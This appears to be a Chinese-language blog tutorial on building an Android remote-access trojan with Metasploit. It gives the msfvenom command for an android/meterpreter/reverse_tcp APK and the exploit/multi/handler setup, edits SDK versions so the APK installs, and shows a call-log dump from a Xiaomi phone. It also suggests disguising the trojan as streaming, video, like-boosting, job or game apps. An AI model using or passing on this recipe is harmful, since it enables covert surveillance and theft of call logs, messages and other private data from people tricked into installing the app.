作者:SwBack
技术交流Q群:768493664
文章在饭前编写,由于着急吃饭,所以排版比较乱
工具 | 型号 | 接入方式 |
---|---|---|
kali | 2021 | 桥接 |
安卓手机 | 小米11 | WIFI |
Android Killer | V1.3.1.0 | apktools 2.6.1 |
实验过程中小米11 未提示风险,(仅签名问题提示非小米应用商店app)
但是功能实际都被拦截,无法获取敏感信息,如通话记录,短信等。
当开启权限之后,信息被成功获取。如文章最下图实战过程中可以对app进行伪装,修改图标,标题,版本,签名
如(XX直播,XX视频,刷赞,兼职,XX游戏等等)
启动kali后,先查看自己本机IP地址如下
┌──(rootkali)-[~/桌面]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:91:2d:65 brd ff:ff:ff:ff:ff:ff
inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0
valid_lft 6529sec preferred_lft 6529sec
inet6 fe80::20c:29ff:fe91:2d65/64 scope link noprefixroute
valid_lft forever preferred_lft forever
然后执行如下命令生成木马文件.
这里监听了5555端口
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=5555 R >Android.apk
开启msf后,加载攻击载荷
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
#设置监听IP
set LHOST 192.168.0.105
#设置监听端口
set LPORT 5555
#进行监听
run
这里的apk还无法直接在安卓中运行。
提示如下:
通过对apk反编译。
网上说修改AndroidManifest.xml 文件.
不过该文件需要反编译才能查看。推荐使用xml2axml.jar
工具进行,该工具可以直接反编译和编译。
这里我们修改apktool.yml
将minSdkVersion
修改为16
targetSdkVersion
修改为23
对其进行编译
导入手机安装运行之后kali 回显如下内容证明攻击成功。
执行下命令app_list
查看下软件列表,看下用什么app看视频
meterpreter > dump_calllog
[*] Fetching 624 entries
[*] Call log saved to calllog_dump_20220824201308.txt
在这里可以通过? 进行查看命令